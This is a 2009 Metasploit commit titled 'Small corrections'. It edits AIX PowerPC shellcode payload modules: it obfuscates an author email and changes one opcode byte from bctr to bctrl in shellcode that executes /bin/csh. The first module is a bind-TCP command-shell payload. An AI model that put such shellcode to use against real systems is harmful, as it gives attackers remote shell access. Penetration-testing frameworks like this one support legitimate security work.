Small corrections.

git-svn-id: file:///home/svn/framework3/trunk@6911 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Ramon de C Valle 2009-07-28 04:46:57 +00:00
parent 89eb1c5cc9
commit b5769ead52
3 changed files with 3 additions and 3 deletions

View File

@ -25,7 +25,7 @@ module Metasploit3
'Name' => 'AIX Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'Author' => 'Ramon de Carvalho Valle <ramon[at]risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'aix',
'Arch' => ARCH_PPC,

View File

@ -98,7 +98,7 @@ module Metasploit3
"\x7c\x24\x0b\x78" +# mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4e\x80\x04\x21" +# bctrl #
"/bin/csh"
end

View File

@ -95,7 +95,7 @@ module Metasploit3
"\x7c\x24\x0b\x78" +# mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4e\x80\x04\x21" +# bctrl #
"/bin/csh"
end